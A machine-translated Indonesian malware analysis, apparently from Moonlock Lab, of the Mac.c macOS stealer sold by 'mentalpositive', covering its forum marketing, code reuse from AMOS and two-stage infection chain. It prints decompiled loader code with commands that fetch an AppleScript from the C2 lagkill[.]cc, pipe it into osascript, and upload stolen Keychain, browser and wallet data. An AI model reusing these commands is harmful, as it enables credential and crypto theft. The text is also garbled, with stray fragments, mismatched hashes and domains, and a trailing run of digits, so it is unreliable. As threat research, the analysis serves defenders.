Kisah pencuri Mac.c tidak dimulai dengan kampanye besar atau pelanggaran. ia dimulai di sudut-sudut forum darknet, di mana seorang aktor ancaman bernama "mentalpositive" pertama muncul, menarik perhatian dengan seperangkat sifat yang tidak biasa yang membedakannya dari pengembang pencuri lainnya. Kami sudah dapat melihat bahwa itu adalah pemain baru yang mengambil keuntungan dari pasar malware macOS yang tetap jauh kurang jenuh daripada homolognya Windows, menandai munculnya gelombang baru aktor ancaman yang baik secara teknis dan ambisius secara komersial. BulanLok Meskipun hanya baru-baru ini aktif, Mac.c sudah bersaing dengan operasi pencuri yang lebih besar dan lebih mapan seperti Meskipun ia meminjamkan banyak uang dari AMOS dan Sebagai lebih banyak URL ditambahkan ke infrastruktur perintah dan kontrol, Mac.c tampaknya menjadi bagian dari ekosistem bawah tanah yang lebih besar yang menargetkan pengguna macOS. Aplikasi Atomic Stealer Rudi4 Apa yang juga menonjol adalah pendekatan metodis dan tidak biasa transparan untuk membangun di publik. 'mental positif' pembaruan kemajuan yang dibagikan dan bahkan umpan balik yang dikumpulkan pada Mac.c builds - tingkat keterbukaan yang mengejutkan di dunia yang biasanya rahasia pengembangan malware macOS. Dalam artikel ini, kami melacak evolusi Mac.c, membongkar taktik mentalpositive, dan memeriksa bagaimana pencuri ini cocok dengan lanskap ancaman yang lebih luas yang menargetkan platform Apple. Pemain baru di pasar Sekitar empat bulan yang lalu, Moonlock Lab pertama kali menyadari munculnya pencuri Mac.c dan mengaitkannya dengan pengembang di bawah alias 'mentalpositive'. agen ancaman ini adalah salah satu dari banyak pemain baru yang memasuki pasar malware macOS, ruang yang masih jauh kurang ramai daripada industri malware yang menargetkan Windows. Mirip dengan pemain ancaman lainnya, 'mentalpositive' mengadopsi tren terbaru dalam pengembangan malware: arsitektur modular untuk digunakan di berbagai kampanye, teknik obfuscation canggih, dan infrastruktur komando dan kontrol (C2) yang semakin kompleks. Namun, profil target dan jangkauan penyaringan data dari mentalpositive Mac.c menonjol. ia mengumpulkan iCloud Keychain credentials, kata sandi yang disimpan di browser, dompet crypto, metadata sistem, dan bahkan file dari lokasi tertentu di macOS - semua menggunakan credentials yang diperoleh melalui phishing. Bangunan di Publik Di luar desain teknis, 'mentalpositive' menunjukkan perilaku yang tidak biasa di berbagai forum darknet. Selama beberapa bulan, aktor ancaman ini menggunakan satu forum bawah tanah untuk menampilkan pembaruan incremental ke Mac.c, berinteraksi dengan pengguna potensial, dan secara aktif meminta umpan balik. Publikasi semacam itu dapat menandakan niat untuk meningkatkan visibilitas dan menggambarkan kehadiran pasar yang berbeda.Ini juga tampaknya meletakkan dasar untuk model bisnis Custom Stealer-as-a-Service yang ditujukan sepenuhnya pada niche ancaman macOS. Screenshot di bawah ini menunjukkan bagaimana posting forum berkembang seiring waktu karena fitur-fitur baru diumumkan.Karena posting asli ditulis dalam bahasa Rusia, kami telah memasukkan penjelasan singkat untuk masing-masing. Menurut mereka, beberapa pembaruan yang paling mencolok termasuk: menggantikan aplikasi Ledger Live asli, mengurangi ukuran biner file (untuk unduhan yang lebih cepat dan artifak yang berpotensi kurang terdeteksi melalui analisis statis), dan optimalisasi panel administrasi. Dalam konteks ini, panel mengacu pada antarmuka berbasis web untuk pelanggan 'mentalpositive', pembeli pencuri Mac.c. Ini memungkinkan mereka untuk menghasilkan build malware, melacak infeksi (termasuk upaya yang sukses dan gagal), dan mengelola rincian kampanye lainnya. Seperti disebutkan sebelumnya, 'mentalpositive' sering memperbarui thread forum mereka untuk menjaga pelanggan potensial tertarik dengan menunjukkan bahwa pengembangan sedang berlangsung. Di bawah ini adalah contoh pembaruan seperti itu, di mana aktor ancaman mengklaim telah menguji versi terbaru dari pencuri terhadap versi macOS di atas 10.12.6. Tox dan Jabber. Telegramnya Dan akhirnya, posting terbaru pada saat penulisan menggambarkan pembaruan tambahan. Ini termasuk melewati XProtect dengan menghasilkan build unik dari awal, daftar yang diperluas dari browser yang didukung, aktivasi file grabber melalui panel kontrol, dan yang paling penting modul terpisah untuk phishing frasa benih Trezor. mirip dengan modul Ledger Live yang ada, fitur baru ini tersedia untuk pembayaran satu kali tambahan $ 1.000. Perbedaan dengan Amos Menariknya, beberapa pengembang di balik pencuri bersaing telah mempertanyakan keaslian kode Mac.c, menyarankan itu mungkin versi yang dimodifikasi dari yang terkenal Atomic macOS Stealer. Moonlock Lab menganalisis dan membandingkan beban manfaat terbaru dari kedua pencuri, dan AMOS dibahas secara rinci di Sementara dua bagian dari kode yang identik, fungsi yang diimplementasikan oleh 'mentalpositive' jauh lebih terbatas. Salah satu artikel terbaru kami (Dibandingkan dengan warna merah) AMOS SHA256: 54b9576aad25d54d703adb9a26feaa5d80f44b94731ff8ecff7cf1ebc15cf3ff Pertama kali dilihat di alam liar: 2025-06-19 20:18:55 ' (Dibandingkan dengan warna hijau) mentalpositive SHA256: 7dfd77f09a90d8d01a7d74a84685645622ae87a90b5dd72a5750daac9195c467 Pertama kali dilihat di alam liar: 2025-07-01 15:41:49 Sebuah pemeriksaan rinci mengungkapkan penggunaan ulang kode tingkat fungsi yang signifikan antara Mac.c dan Atomic macOS Stealer. Dalam beberapa kasus, fungsi tampaknya telah disalin secara verbatim atau dengan perubahan minimal, yang menunjukkan baik asal-usul pengembangan bersama atau pinjaman kode langsung. Secara fungsional, kedua pencuri berbagi set fitur yang hampir identik yang dirancang untuk pencurian data yang komprehensif di sistem macOS. Dalam kedua kasus, kemampuan ini dijalankan menggunakan alat dan skrip macOS asli, meminimalkan ketergantungan eksternal dan meningkatkan evasion. Terlepas dari internal yang mereka bagikan, AMOS memperkenalkan kemajuan yang signifikan dalam persistensi, modularitas, dan targeting. Sementara Mac.c beroperasi sebagai pencuri berbasis AppleScript yang kompak dan tidak persisten, Atomic macOS Stealer mewakili ancaman yang lebih maju, persisten, dan modular dari filosofi desain yang sama. Tingkat tinggi penggunaan ulang kode menimbulkan pertanyaan penting tentang atribusi, ketersediaan pembuat, dan kolaborasi potensial dalam lingkaran pengembangan malware macOS. sementara alat 'mentalpositive' mungkin lebih baru, itu tidak sepenuhnya asli - dan AMOS tetap varian pencuri yang lebih mampu dan berbahaya yang diamati di alam liar saat ini. Cara Menggunakan Mac.c Stealer sudah disebutkan dalam Sejak saat itu, domain operasional mereka tidak berubah: https://lagkill[.]cc. Ini host file PHP yang digunakan untuk melacak korban dan beberapa prosedur eksfiltrasi. 'mentalpositive' Laporan sebelumnya dari Moonlock Lab Domain ini memiliki hubungan dengan beberapa file Mach-O, tetapi secara umum alur kerja dapat diringkas menjadi 2 tahap: Mach-O yang dapat dijalankan awal dan AppleScript payload. Tahap 1: Mach-O awal yang dapat dilakukan Pencuri Mac.c menggunakan strategi eksekusi multi-etape, dengan tahap pertama bertindak sebagai pengisi ringan yang bertanggung jawab untuk penyebaran tersembunyi, sanitasi lingkungan, dan pengiriman terkontrol dari beban berguna berikutnya. Di bawah ini adalah pemecahan rinci dari tahap ini, berdasarkan rekayasa terbalik dari sampel 90309fc3b90df1d7b6d7d747c5afa63fca6262721ce39c34da4b13901d53b919a3. undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c entry point (entry()) dimulai dengan forking proses saat ini dan menciptakan sesi baru melalui setsid(), secara efektif daemonizing dirinya sendiri. Selain itu, kami mengamati fungsi dasar yang mengalihkan semua input standar, output, dan aliran kesalahan ke /dev/null menggunakan freopen(). Malware hardcodes domain command-and-control (C2) sebagai: lagkill[.]cc. Ini juga menghasilkan pengidentifikasi korban yang unik dengan menghubungkan beberapa string hexadecimal statis. ini menghasilkan token txd yang unik, yang digunakan untuk mencetak sidik jari host yang terinfeksi atau untuk melacak batch infeksi selama komunikasi C2. Tindakan kunci pada tahap ini adalah untuk mengambil dan menjalankan remote AppleScript. hal ini dicapai dengan rantai curl dan osascript untuk men-download dan langsung menjalankan payload: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript Metode ini memungkinkan penyerang untuk memperbarui payload secara dinamis tanpa mengubah loader, membuat atribusi lebih sulit karena jalur eksekusi tidak langsung. Setelah menjalankan AppleScript (yang mungkin melakukan pencurian data lokal), loader memeriksa keberhasilan dan melanjutkan untuk mengekfiltrasi arsip ZIP kembali ke server C2 yang sama: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ Upload ini dikirim menggunakan header kustom (cl: 0) dan timeout murah hati untuk menampung sistem yang lebih lambat, menyarankan perhatian yang hati-hati terhadap stabilitas operasional. Tahap 2: AppleScript Payload Tahap kedua dari pencuri Mac.c adalah di mana kerusakan nyata dimulai. AppleScript menggunakan kemampuan scripting macOS asli untuk mengekstrak berbagai data sensitif. Di bawah ini, kami membagi taktik payload tahap kedua menurut kategori. Credential theft & CLI abuse Skrip ini meluncurkan petunjuk sistem palsu yang meminta kata sandi pengguna. ini disimpan dalam teks sederhana dan digunakan kembali nanti. Kemudian secara diam-diam memanggil utilitas keamanan CLI untuk mengekstrak kredensial yang disimpan dari Keychain, secara khusus menargetkan Google Chrome dan aplikasi berbasis Chromium. Data yang dikumpulkan ditulis menjadi /tmp/<random>/Password. Taktik phishing ini memanfaatkan kepercayaan asli dan antarmuka macOS yang akrab untuk menghindari skeptisitas pengguna. Browser and extensions data theft Browser yang ditargetkan termasuk Chrome, Edge, Brave, dan Yandex. File yang diekstrak meliputi: data login, cookie, data web, penyimpanan IndexedDB. Akhirnya, script ini berterusan melalui ratusan ekstensi dompet kripto yang dikenal – seperti MetaMask, Phantom, dan Binance Wallet – dan menarik file penyimpanan lokal atau artefak sesi. Semua loot yang terkait dengan browser diatur di bawah /tmp/<random>/Browsers/. Hot wallet and crypto app harvesting Payload memindai kehadiran dompet crypto desktop populer, termasuk: listrik eksodus Coinomi Atomik Monero Wasabi Ledger hidup Data yang relevan seperti file dompet dan database konfigurasi (misalnya, direktori LevelDB) disalin ke /tmp/<random>/Cryptowallets/. Ini menunjukkan motivasi keuangan yang jelas, dengan penargetan yang disesuaikan dengan basis pengguna penggemar crypto macOS. File-grabber and its logic Untuk memaksimalkan nilai kecerdasan sambil meminimalkan jejak, skrip melakukan hal berikut: Recursively mencari folder Desktop, Documents, dan Downloads pengguna. Filter untuk jenis file bernilai tinggi: .wallet, .seed, .txt, .keys, .pdf, .docx. Memaksa batas ukuran file ~10MB. Pendekatan ini memprioritaskan file berisik rendah, sinyal tinggi yang mencakup frasa benih potensial, kunci pemulihan, dan PDF sensitif. Collection of messaging and app artifacts Mac.c menyalin folder tdata, yang dapat mencakup token sesi aktif atau pesan cache (yang terhubung ke Telegram). File konfigurasi dari aplikasi Binance dan Ton Keeper juga disalin, menawarkan wawasan tentang penggunaan dompet, pola login, atau kunci yang disimpan. Menggunakan system_profiler untuk mengumpulkan data hardware, macOS, dan display. Penjelajahan yang luas ini menunjukkan niat untuk membangun kembali konteks pengguna, bukan hanya mengekfiltrasi aset. Archiving and exfiltration Semua data yang dikumpulkan diatur ke dalam direktori sementara terstruktur /tmp/<random>/. Menggunakan ditto -c -k, alat arsip native macOS, seluruh direktori dipindahkan ke /tmp/osalogging.zip. Setelah arsip, beban berguna keluar. tidak ada pemantauan latar belakang atau eksekusi berulang. Desain efemeral yang berfokus pada stealth ini menunjukkan operasi smash-and-grab yang cepat, kemungkinan dimaksudkan untuk akses satu kali atau sebagai bagian dari rantai infeksi yang lebih besar. Strategi Phishing Sebuah teknik yang sangat menipu yang digunakan dalam payload tahap kedua 'mentalpositive' melibatkan petunjuk sistem palsu yang disamarkan sebagai permintaan izin permainan. secara khusus, Mac.c memanggil dialog AppleScript asli yang meminta pengguna untuk memasukkan kata sandi login macOS mereka untuk "membiarkan permainan untuk menyelamatkan arsip-arsip mereka.” Penyihir yang Tak Bersalah Selain itu, payloads tersebut datang dengan tag build ‘tidak bersalah’ (atau, dalam beberapa kasus, ‘tidak bersalah’), yang mungkin digunakan untuk mengidentifikasi infeksi yang terkait dengan kampanye tertentu ini. Akhirnya, domain yang mungkin disewa khusus untuk kampanye ini adalah innocentwitches[.]top. Sementara URL akar mengarahkan ke Google, itu juga mencakup rute /upload.php, memungkinkan agen ancaman untuk menerima data yang dicuri. Kesimpulan Karena komputer Mac terus meningkat dalam popularitas di kalangan pengguna rata-rata dan pemegang kripto khususnya, kami mengharapkan pencuri untuk skala tidak hanya dalam kemampuan mereka, tetapi dalam pangsa pasar dan dampak mereka. Mac.c bukan kasus terisolasi, tetapi bagian dari tren yang berkembang menuju pengembangan malware macOS yang profesional. sementara itu menggunakan kembali fungsi kunci dan elemen arsitektur dari Atomic Stealer yang populer, itu juga membawa hal baru ke pencuri macOS dan menempatkan mereka pada lintasan yang berbeda. Apa yang mungkin kita saksikan adalah munculnya model bisnis baru: stealer-as-a-service, yang ditujukan khusus untuk pengguna macOS dan bercabang keluar dari industri malware-as-a-service yang lebih luas. IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php 7dd77f09a90d8d01a7d74a84a685645622ae87a90b5dd72a5750daac9195c467 33e9b605406ffb779dc912a1ce66436a8867b88e087bc34b2b2fca2160b64ca7 57b86903c46cf45c968aa9618c0a45eb135e05b24c13c0d27442d4387de37319 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
